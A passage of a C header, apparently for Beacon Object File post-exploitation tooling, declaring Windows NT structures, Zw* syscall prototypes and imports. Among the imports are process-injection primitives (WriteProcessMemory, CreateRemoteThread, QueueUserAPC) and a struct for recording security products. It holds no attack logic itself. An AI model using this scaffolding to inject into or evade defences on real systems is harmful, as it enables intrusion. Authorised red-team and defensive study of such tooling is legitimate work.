	LARGE_INTEGER KernelTime;
	UNICODE_STRING ProcessName;
	KPRIORITY BasePriority;
	HANDLE ProcessId;
	HANDLE InheritedFromProcessId;
} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;

typedef struct _SYSTEM_PROCESS_ID_INFORMATION {
	HANDLE ProcessId;
	UNICODE_STRING ImageName;
} SYSTEM_PROCESS_ID_INFORMATION, *PSYSTEM_PROCESS_ID_INFORMATION;

typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
	HANDLE Section;
	PVOID MappedBase;
	PVOID ImageBase;
	ULONG ImageSize;
	ULONG Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT OffsetToFileName;
	UCHAR FullPathName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {
	ULONG NumberOfModules;
	SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef struct _PROCESS_BASIC_INFORMATION_WOW64 {
	NTSTATUS ExitStatus;
	ULONG64 PebBaseAddress;
	ULONG64 AffinityMask;
	KPRIORITY BasePriority;
	ULONG64 UniqueProcessId;
	ULONG64 InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION_WOW64, *PPROCESS_BASIC_INFORMATION_WOW64;

typedef struct _UNICODE_STRING_WOW64 {
	USHORT Length;
	USHORT MaximumLength;
	ULONG64 Buffer;
} UNICODE_STRING_WOW64;

typedef struct _API_SET_NAMESPACE {
	ULONG Version;
	ULONG Size;
	ULONG Flags;
	ULONG Count;
	ULONG EntryOffset;
	ULONG HashOffset;
	ULONG HashFactor;
} API_SET_NAMESPACE, *PAPI_SET_NAMESPACE;

typedef struct _CURDIR64 {
	UNICODE_STRING_WOW64 DosPath;
	HANDLE Handle;
} CURDIR64, *PCURDIR64;

typedef struct _RTL_USER_PROCESS_PARAMETERS64 {
	ULONG MaximumLength;
	ULONG Length;
	ULONG Flags;
	ULONG DebugFlags;
	ULONG64 ConsoleHandle;
	ULONG ConsoleFlags;
	ULONG64 StandardInput;
	ULONG64 StandardOutput;
	ULONG64 StandardError;
	CURDIR64 CurrentDirectory;
	UNICODE_STRING_WOW64 DllPath;
	UNICODE_STRING_WOW64 ImagePathName;
	UNICODE_STRING_WOW64 CommandLine;
} RTL_USER_PROCESS_PARAMETERS64, *PRTL_USER_PROCESS_PARAMETERS64;

typedef struct _PEB64 {
	BYTE Reserved[16];
	ULONG64 ImageBaseAddress;
	ULONG64 LdrData;
	ULONG64 ProcessParameters;
} PEB64, *PPEB64;

typedef struct _SECPROD {
	DWORD dwPID;
	WCHAR wcCompany[MAX_PATH];
	WCHAR wcDescription[MAX_PATH];
} SECPROD, *PSECPROD;

typedef struct _SECCOMP {
	WCHAR wcCompany[64];
} SECCOMP, *PSECCOMP;

//==============================================================================
// EXTERN_C NTSTATUS DECLARATIONS
//==============================================================================
EXTERN_C NTSTATUS ZwQuerySystemInformation(
	SYSTEM_INFORMATION_CLASS SystemInformationClass,
	PVOID SystemInformation,
	ULONG SystemInformationLength,
	PULONG ReturnLength
);

EXTERN_C NTSTATUS ZwQueryInformationProcess(
	HANDLE ProcessHandle,
	DWORD ProcessInformationClass,
	PVOID ProcessInformation,
	DWORD ProcessInformationLength,
	PDWORD ReturnLength
);

EXTERN_C NTSTATUS ZwOpenProcess(
	PHANDLE ProcessHandle,
	ACCESS_MASK DesiredAccess,
	POBJECT_ATTRIBUTES ObjectAttributes,
	PCLIENT_ID ClientId
);

EXTERN_C NTSTATUS ZwQueryInformationToken(
	HANDLE TokenHandle,
	TOKEN_INFORMATION_CLASS TokenInformationClass,
	PVOID TokenInformation,
	ULONG TokenInformationLength,
	PULONG ReturnLength
);

EXTERN_C NTSTATUS ZwAdjustPrivilegesToken(
	IN HANDLE TokenHandle,
	IN BOOLEAN DisableAllPrivileges,
	IN PTOKEN_PRIVILEGES TokenPrivileges,
	IN ULONG PreviousPrivilegesLength,
	OUT PTOKEN_PRIVILEGES PreviousPrivileges OPTIONAL,
	OUT PULONG RequiredLength OPTIONAL
);

EXTERN_C NTSTATUS ZwAllocateVirtualMemory(
	HANDLE ProcessHandle,
	PVOID *BaseAddress,
	ULONG_PTR ZeroBits,
	PSIZE_T RegionSize,
	ULONG AllocationType,
	ULONG Protect
);

EXTERN_C NTSTATUS ZwFreeVirtualMemory(
	HANDLE ProcessHandle,
	PVOID *BaseAddress,
	IN OUT PSIZE_T RegionSize,
	ULONG FreeType
);

EXTERN_C NTSTATUS ZwReadVirtualMemory(
	HANDLE hProcess,
	PVOID lpBaseAddress,
	PVOID lpBuffer,
	SIZE_T NumberOfBytesToRead,
	PSIZE_T NumberOfBytesRead
);

EXTERN_C NTSTATUS ZwWriteVirtualMemory(
	HANDLE hProcess,
	PVOID lpBaseAddress,
	PVOID lpBuffer,
	SIZE_T NumberOfBytesToWrite,
	PSIZE_T NumberOfBytesWrite
);

EXTERN_C NTSTATUS ZwCreateFile(
	PHANDLE FileHandle,
	ACCESS_MASK DesiredAccess,
	POBJECT_ATTRIBUTES ObjectAttributes,
	PIO_STATUS_BLOCK IoStatusBlock,
	PLARGE_INTEGER AllocationSize,
	ULONG FileAttributes,
	ULONG ShareAccess,
	ULONG CreateDisposition,
	ULONG CreateOptions,
	PVOID EaBuffer,
	ULONG EaLength
);

EXTERN_C NTSTATUS ZwClose(IN HANDLE KeyHandle);

// KERNEL32
WINBASEAPI void * WINAPI KERNEL32$VirtualAlloc (LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
WINBASEAPI int WINAPI KERNEL32$VirtualFree (LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalAlloc (UINT, SIZE_T);
DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree (HLOCAL);
WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
WINBASEAPI LPVOID WINAPI KERNEL32$HeapReAlloc (HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes);
WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap();
WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID);
WINBASEAPI DWORD WINAPI KERNEL32$FormatMessageA (DWORD dwFlags, LPCVOID lpSource, DWORD dwMessageId, DWORD dwLanguageId, LPSTR lpBuffer, DWORD nSize, va_list *Arguments);
WINBASEAPI int WINAPI KERNEL32$WideCharToMultiByte (UINT CodePage, DWORD dwFlags, LPCWCH lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCCH lpDefaultChar, LPBOOL lpUsedDefaultChar);
WINBASEAPI int WINAPI KERNEL32$FileTimeToLocalFileTime (CONST FILETIME *lpFileTime, LPFILETIME lpLocalFileTime);
WINBASEAPI int WINAPI KERNEL32$FileTimeToSystemTime (CONST FILETIME *lpFileTime, LPSYSTEMTIME lpSystemTime);
WINBASEAPI int WINAPI KERNEL32$GetDateFormatW (LCID Locale, DWORD dwFlags, CONST SYSTEMTIME *lpDate, LPCWSTR lpFormat, LPWSTR lpDateStr, int cchDate);
WINBASEAPI VOID WINAPI KERNEL32$GetSystemTimeAsFileTime (LPFILETIME lpSystemTimeAsFileTime);
WINBASEAPI VOID WINAPI KERNEL32$GetLocalTime (LPSYSTEMTIME lpSystemTime);
WINBASEAPI WINBOOL WINAPI KERNEL32$SystemTimeToFileTime (CONST SYSTEMTIME *lpSystemTime, LPFILETIME lpFileTime);
WINBASEAPI WINBOOL WINAPI KERNEL32$SystemTimeToTzSpecificLocalTime (CONST TIME_ZONE_INFORMATION *lpTimeZoneInformation, CONST SYSTEMTIME *lpUniversalTime, LPSYSTEMTIME lpLocalTime);
WINBASEAPI WINBOOL WINAPI KERNEL32$GlobalMemoryStatusEx (LPMEMORYSTATUSEX lpBuffer);
WINBASEAPI WINBOOL WINAPI KERNEL32$GetDiskFreeSpaceExA (LPCSTR lpDirectoryName, PULARGE_INTEGER lpFreeBytesAvailableToCaller, PULARGE_INTEGER lpTotalNumberOfBytes, PULARGE_INTEGER lpTotalNumberOfFreeBytes);
WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess (VOID);
DECLSPEC_IMPORT DWORD KERNEL32$GetCurrentProcessId(VOID);
WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID);
WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateThread (LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
WINBASEAPI DWORD WINAPI KERNEL32$GetTickCount (VOID);
WINBASEAPI ULONGLONG WINAPI KERNEL32$GetTickCount64 (VOID);
WINBASEAPI LPVOID WINAPI KERNEL32$CreateFiber (SIZE_T dwStackSize, LPFIBER_START_ROUTINE lpStartAddress, LPVOID lpParameter);
WINBASEAPI LPVOID WINAPI KERNEL32$ConvertThreadToFiber (LPVOID lpParameter);
WINBASEAPI WINBOOL WINAPI KERNEL32$ConvertFiberToThread (VOID);
WINBASEAPI VOID WINAPI KERNEL32$DeleteFiber (LPVOID lpFiber);
WINBASEAPI VOID WINAPI KERNEL32$SwitchToFiber (LPVOID lpFiber);
WINBASEAPI DWORD WINAPI KERNEL32$WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
WINBASEAPI VOID WINAPI KERNEL32$Sleep (DWORD dwMilliseconds);
WINBASEAPI WINBOOL WINAPI KERNEL32$DeleteFileW (LPCWSTR lpFileName);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
WINBASEAPI DWORD WINAPI KERNEL32$GetFileSize (HANDLE hFile, LPDWORD lpFileSizeHigh);
WINBASEAPI WINBOOL WINAPI KERNEL32$ReadFile (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId);
WINBASEAPI WINBOOL WINAPI KERNEL32$GetComputerNameExW (COMPUTER_NAME_FORMAT NameType, LPWSTR lpBuffer, LPDWORD nSize);
WINBASEAPI int WINAPI KERNEL32$lstrlenW (LPCWSTR lpString);
WINBASEAPI LPWSTR WINAPI KERNEL32$lstrcatW (LPWSTR lpString1, LPCWSTR lpString2);
WINBASEAPI LPWSTR WINAPI KERNEL32$lstrcpynW (LPWSTR lpString1, LPCWSTR lpString2, int iMaxLength);
WINBASEAPI DWORD WINAPI KERNEL32$GetFullPathNameW (LPCWSTR lpFileName, DWORD nBufferLength, LPWSTR lpBuffer, LPWSTR *lpFilePart);
WINBASEAPI DWORD WINAPI KERNEL32$GetFileAttributesW (LPCWSTR lpFileName);
WINBASEAPI DWORD WINAPI KERNEL32$GetCurrentDirectoryW (DWORD nBufferLength, LPWSTR lpBuffer);
WINBASEAPI HANDLE WINAPI KERNEL32$FindFirstFileW (LPCWSTR lpFileName, LPWIN32_FIND_DATAW lpFindFileData);
WINBASEAPI HANDLE WINAPI KERNEL32$FindFirstFileA (char * lpFileName, LPWIN32_FIND_DATA lpFindFileData);
WINBASEAPI WINBOOL WINAPI KERNEL32$FindNextFileW (HANDLE hFindFile, LPWIN32_FIND_DATAW lpFindFileData);
WINBASEAPI WINBOOL WINAPI KERNEL32$FindNextFileA (HANDLE hFindFile, LPWIN32_FIND_DATA lpFindFileData);
WINBASEAPI WINBOOL WINAPI KERNEL32$FindClose (HANDLE hFindFile);
WINBASEAPI VOID WINAPI KERNEL32$SetLastError (DWORD dwErrCode);
#define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size)
#define intRealloc(ptr, size) (ptr) ? KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, ptr, size) : KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size)
#define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, addr)
#define intZeroMemory(addr,size) MSVCRT$memset((addr),0,size)
DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalAlloc(UINT uFlags, SIZE_T dwBytes);
DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalFree(HGLOBAL hMem);
DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalReAlloc(HGLOBAL hMem, SIZE_T dwBytes, UINT uFlags);
WINBASEAPI DWORD   WINAPI KERNEL32$GetFileType(HANDLE hFile);
WINBASEAPI WINBOOL WINAPI KERNEL32$DuplicateHandle(HANDLE hSourceProcessHandle, HANDLE hSourceHandle, HANDLE hTargetProcessHandle, LPHANDLE lpTargetHandle, DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwOptions);
WINBASEAPI WINBOOL WINAPI KERNEL32$DeleteFileA(LPCSTR lpFileName);
DECLSPEC_IMPORT LPTCH WINAPI KERNEL32$GetEnvironmentStrings();
DECLSPEC_IMPORT LPWCH WINAPI KERNEL32$GetEnvironmentStringsW();
DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$FreeEnvironmentStringsA(LPSTR);
WINBASEAPI DWORD WINAPI KERNEL32$ExpandEnvironmentStringsW (LPCWSTR lpSrc, LPWSTR lpDst, DWORD nSize);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID);
WINBASEAPI WINBOOL WINAPI KERNEL32$Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe);
WINBASEAPI WINBOOL WINAPI KERNEL32$Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe);
WINBASEAPI WINBOOL WINAPI KERNEL32$Module32First(HANDLE hSnapshot,LPMODULEENTRY32 lpme);
WINBASEAPI WINBOOL WINAPI KERNEL32$Module32Next(HANDLE hSnapshot,LPMODULEENTRY32 lpme);
WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA (LPCSTR lpLibFileName);
WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress (HMODULE hModule, LPCSTR lpProcName);
WINBASEAPI WINBOOL WINAPI KERNEL32$FreeLibrary (HMODULE hLibModule);
DECLSPEC_IMPORT WINBASEAPI int WINAPI KERNEL32$lstrlenA(LPCSTR);
DECLSPEC_IMPORT int WINAPI KERNEL32$GetLocaleInfoEx(LPCWSTR lpLocaleName, LCTYPE LCType, LPWSTR lpLCData, int cchData);
WINBASEAPI int WINAPI KERNEL32$GetSystemDefaultLocaleName(LPCWSTR lpLocaleName, int cchLocaleName);
DECLSPEC_IMPORT LCID WINAPI KERNEL32$LocaleNameToLCID(LPCWSTR lpName, DWORD dwFlags);
DECLSPEC_IMPORT int WINAPI KERNEL32$GetDateFormatEx(LPCWSTR lpLocaleName, DWORD dwFlags, const SYSTEMTIME *lpData, LPCWSTR lpFormat, LPWSTR lpDateStr, int cchDate, LPCWSTR lpCalendar);
WINBASEAPI LPVOID WINAPI KERNEL32$VirtualAllocEx (HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
WINBASEAPI WINBOOL WINAPI KERNEL32$VirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpfOldProtect);
WINBASEAPI WINBOOL WINAPI KERNEL32$VirtualProtectEx (HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
WINBASEAPI SIZE_T WINAPI KERNEL32$VirtualQuery(LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength);
WINBASEAPI SIZE_T WINAPI KERNEL32$VirtualQueryEx (HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength);
WINBASEAPI int WINAPI KERNEL32$VirtualFreeEx (HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
WINBASEAPI int WINAPI KERNEL32$MultiByteToWideChar (UINT CodePage, DWORD dwFlags, LPCCH lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar);
WINBASEAPI VOID WINAPI KERNEL32$GetSystemInfo (LPSYSTEM_INFO lpSystemInfo);
WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentThread (VOID);
WINBASEAPI DWORD WINAPI KERNEL32$GetProcessIdOfThread (HANDLE Thread);
WINBASEAPI WINBOOL WINAPI KERNEL32$ProcessIdToSessionId (DWORD dwProcessId, DWORD *pSessionId);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateRemoteThread (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
WINBASEAPI HANDLE WINAPI KERNEL32$OpenThread (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwThreadId);
WINBASEAPI WINBOOL WINAPI KERNEL32$GetThreadContext (HANDLE hThread, LPCONTEXT lpContext);
WINBASEAPI WINBOOL WINAPI KERNEL32$SetThreadContext (HANDLE hThread, CONST LPCONTEXT lpContext);
WINBASEAPI DWORD WINAPI KERNEL32$SuspendThread (HANDLE hThread);
WINBASEAPI DWORD WINAPI KERNEL32$ResumeThread (HANDLE hThread);
WINBASEAPI DWORD WINAPI KERNEL32$GetThreadId(HANDLE hThread);
WINBASEAPI WINBOOL WINAPI KERNEL32$TerminateThread (HANDLE hThread, DWORD dwExitCode);
WINBASEAPI WINBOOL WINAPI KERNEL32$TerminateProcess(HANDLE hProcess, UINT uExitcode);
WINBASEAPI WINBOOL WINAPI KERNEL32$GetExitCodeProcess (HANDLE hProcess, LPDWORD lpExitCode);
WINBASEAPI DWORD WINAPI KERNEL32$GetProcessId(HANDLE Process);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileA (LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
WINBASEAPI BOOL WINAPI KERNEL32$GetFileSizeEx(HANDLE hFile, PLARGE_INTEGER lpFileSize);
WINBASEAPI WINBOOL WINAPI KERNEL32$WriteFile (HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
WINBASEAPI DWORD WINAPI KERNEL32$SetFilePointer (HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod);
WINBASEAPI WINBOOL WINAPI KERNEL32$GetFileInformationByHandle (HANDLE hFile, LPBY_HANDLE_FILE_INFORMATION lpFileInformation);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileMappingA (HANDLE hFile, LPSECURITY_ATTRIBUTES lpFileMappingAttributes, DWORD flProtect, DWORD dwMaximumSizeHigh, DWORD dwMaximumSizeLow, LPCSTR lpName);
WINBASEAPI LPVOID WINAPI KERNEL32$MapViewOfFile (HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow, SIZE_T dwNumberOfBytesToMap);
WINBASEAPI WINBOOL WINAPI KERNEL32$UnmapViewOfFile (LPCVOID lpBaseAddress);
WINBASEAPI WINBOOL WINAPI KERNEL32$WriteProcessMemory (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);
WINBASEAPI WINBOOL WINAPI KERNEL32$ReadProcessMemory (HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead);
WINBASEAPI WINBOOL WINAPI KERNEL32$CreateProcessW (LPCWSTR lpApplicationName, LPWSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, WINBOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
WINBASEAPI WINBOOL WINAPI KERNEL32$CreateProcessA (LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, WINBOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
WINBASEAPI WINBOOL WINAPI KERNEL32$InitializeProcThreadAttributeList (LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, DWORD dwAttributeCount, DWORD dwFlags, PSIZE_T lpSize);
WINBASEAPI WINBOOL WINAPI KERNEL32$UpdateProcThreadAttribute (LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, DWORD dwFlags, DWORD_PTR Attribute, PVOID lpValue, SIZE_T cbSize, PVOID lpPreviousValue, PSIZE_T lpReturnSize);
WINBASEAPI VOID WINAPI KERNEL32$DeleteProcThreadAttributeList (LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList);
WINBASEAPI WINBOOL WINAPI KERNEL32$GetComputerNameA (LPSTR lpBuffer, LPDWORD nSize);
WINBASEAPI int WINAPI KERNEL32$lstrcmpA (LPCSTR lpString1, LPCSTR lpString2);
WINBASEAPI int WINAPI KERNEL32$lstrcmpW (LPCWSTR lpString1, LPCWSTR lpString2);
WINBASEAPI int WINAPI KERNEL32$lstrcmpiW (LPCWSTR lpString1, LPCWSTR lpString2);
WINBASEAPI DWORD WINAPI KERNEL32$GetFinalPathNameByHandleW(HANDLE hFile, LPWSTR lpszFilePath, DWORD cchFilePath, DWORD dwFlags);
WINBASEAPI DWORD WINAPI KERNEL32$GetFileAttributesA(LPCSTR lpFileName);
WINBASEAPI WINBOOL WINAPI KERNEL32$CreateDirectoryW (LPCWSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes);
WINBASEAPI DWORD WINAPI KERNEL32$GetEnvironmentVariableA(LPCSTR lpName, LPSTR lpBuffer, DWORD nSize);
WINBASEAPI DWORD WINAPI KERNEL32$ExpandEnvironmentStringsA (LPCSTR lpSrc, LPSTR lpDst, DWORD nSize);
WINBASEAPI DWORD WINAPI KERNEL32$GetTempPathW (DWORD nBufferLength, LPWSTR lpBuffer);
WINBASEAPI DWORD WINAPI KERNEL32$GetTempFileNameW (LPCWSTR lpPathName, LPCWSTR lpPrefixString, UINT uUnique, LPWSTR lpTempFileName);
WINBASEAPI BOOL WINAPI KERNEL32$OpenProcessToken(HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);
WINBASEAPI BOOL WINAPI KERNEL32$SetEvent (HANDLE hEvent);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateEventA (LPSECURITY_ATTRIBUTES lpEventAttributes, WINBOOL bManualReset, WINBOOL bInitialState, LPCSTR lpName);
WINBASEAPI BOOL WINAPI KERNEL32$CreatePipe(PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize);
WINBASEAPI BOOL WINAPI KERNEL32$PeekNamedPipe(HANDLE hNamedPipe, LPVOID lpBuffer, DWORD nBufferSize, LPDWORD lpBytesRead, LPDWORD lpTotalBytesAvail, LPDWORD lpBytesLeftThisMessage);
WINBASEAPI HANDLE WINAPI KERNEL32$CreateNamedPipeA(LPCSTR lpName, DWORD dwOpenMode, DWORD dwPipeMode, DWORD nMaxInstances, DWORD nOutBufferSize, DWORD nInBufferSize, DWORD nDefaultTimeOut, LPSECURITY_ATTRIBUTES lpSecurityAttributes);
WINBASEAPI BOOL WINAPI KERNEL32$ConnectNamedPipe(HANDLE hNamedPipe, LPOVERLAPPED lpOverlapped);
WINBASEAPI BOOL WINAPI KERNEL32$GetBinaryTypeW(LPCWSTR lpApplicationName, LPDWORD lpBinaryType);
WINBASEAPI BOOL WINAPI KERNEL32$DeviceIoControl (HANDLE hDevice, DWORD dwIoControlCode, LPVOID lpInBuffer, DWORD nInBufferSize, LPVOID lpOutBuffer, DWORD nOutBufferSize, LPDWORD lpBytesReturned, LPOVERLAPPED lpOverlapped);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$IsBadWritePtr(LPVOID lp, UINT_PTR ucb);
WINBASEAPI BOOL WINAPI KERNEL32$QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount);
WINBASEAPI BOOL WINAPI KERNEL32$QueryPerformanceFrequency(LARGE_INTEGER *lpFrequency);
WINBASEAPI DWORD WINAPI KERNEL32$QueueUserAPC(PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData);
WINBASEAPI DWORD WINAPI KERNEL32$GetModuleFileNameA(HANDLE hModule, LPSTR lpFilename, DWORD nSize);
WINBASEAPI DWORD WINAPI KERNEL32$GetProcessHeaps(DWORD NumberOfHeaps, PHANDLE ProcessHeaps);
WINBASEAPI HWND WINAPI KERNEL32$GetConsoleWindow(void);
WINBASEAPI BOOL WINAPI KERNEL32$AllocConsole(void);
WINBASEAPI BOOL WINAPI KERNEL32$FreeConsole(void);
WINBASEAPI HANDLE WINAPI KERNEL32$GetStdHandle(DWORD nStdHandle);
WINBASEAPI BOOL WINAPI KERNEL32$SetStdHandle(DWORD nStdHandle, HANDLE hHandle);
WINBASEAPI UINT WINAPI KERNEL32$GetWindowsDirectoryA(LPSTR lpBuffer, UINT uSize);
WINBASEAPI LPWSTR WINAPI KERNEL32$GetCommandLineW(VOID);
WINBASEAPI LPSTR WINAPI KERNEL32$GetCommandLineA(VOID);
DECLSPEC_IMPORT DECLSPEC_NORETURN VOID WINAPI KERNEL32$ExitThread (DWORD dwExitCode);
DECLSPEC_IMPORT long WINAPI KERNEL32$InterlockedIncrement(LONG volatile* Addend);

//WTSAPI32
DECLSPEC_IMPORT DWORD WINAPI WTSAPI32$WTSEnumerateSessionsA(LPVOID, DWORD, DWORD, PWTS_SESSION_INFO*, DWORD*);
WINBASEAPI BOOL WINAPI WTSAPI32$WTSEnumerateSessionsW(HANDLE hServer, DWORD Reserved, DWORD Version, PWTS_SESSION_INFOW *ppSessionInfo, DWORD *pCount);
DECLSPEC_IMPORT DWORD WINAPI WTSAPI32$WTSQuerySessionInformationA(LPVOID, DWORD, WTS_INFO_CLASS , LPSTR*, DWORD*);
WINBASEAPI BOOL WINAPI WTSAPI32$WTSQuerySessionInformationW(HANDLE hServer, DWORD SessionId, WTS_INFO_CLASS WTSInfoClass, LPWSTR *ppBuffer, DWORD *pBytesReturned);
DECLSPEC_IMPORT DWORD WINAPI WTSAPI32$WTSFreeMemory(PVOID);

//Iphlpapi.lib
//ULONG WINAPI IPHLPAPI$GetAdaptersInfo (PIP_ADAPTER_INFO AdapterInfo, PULONG SizePointer);
DECLSPEC_IMPORT DWORD WINAPI IPHLPAPI$GetAdaptersInfo(PIP_ADAPTER_INFO,PULONG);
DECLSPEC_IMPORT DWORD WINAPI IPHLPAPI$GetIpForwardTable (PMIB_IPFORWARDTABLE pIpForwardTable, PULONG pdwSize, WINBOOL bOrder);
DECLSPEC_IMPORT DWORD WINAPI IPHLPAPI$GetNetworkParams(PFIXED_INFO,PULONG);
DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetUdpTable (PMIB_UDPTABLE UdpTable, PULONG SizePointer, WINBOOL Order);
DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetTcpTable (PMIB_TCPTABLE TcpTable, PULONG SizePointer, WINBOOL Order);
DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetIpNetTable(PMIB_IPNETTABLE IpNetTable,PULONG SizePointer, BOOL Order);
DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetTcpTable2(PMIB_TCPTABLE2 TcpTable, PULONG SizePointer, BOOL Order);
DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetTcp6Table2(PMIB_TCP6TABLE2 TcpTable, PULONG SizePointer, BOOL Order);

//MSVCRT
WINBASEAPI char *__cdecl MSVCRT$_ultoa(unsigned long _Value,char *_Dest,int _Radix);
WINBASEAPI void *__cdecl MSVCRT$calloc(size_t _NumOfElements, size_t _SizeOfElements);
WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount);
WINBASEAPI int __cdecl MSVCRT$memcmp(const void *_Buf1,const void *_Buf2,size_t _Size);
WINBASEAPI void *__cdecl MSVCRT$realloc(void *_Memory, size_t _NewSize);
WINBASEAPI void __cdecl MSVCRT$free(void *_Memory);
WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
WINBASEAPI int __cdecl MSVCRT$sprintf(char *__stream, const char *__format, ...);
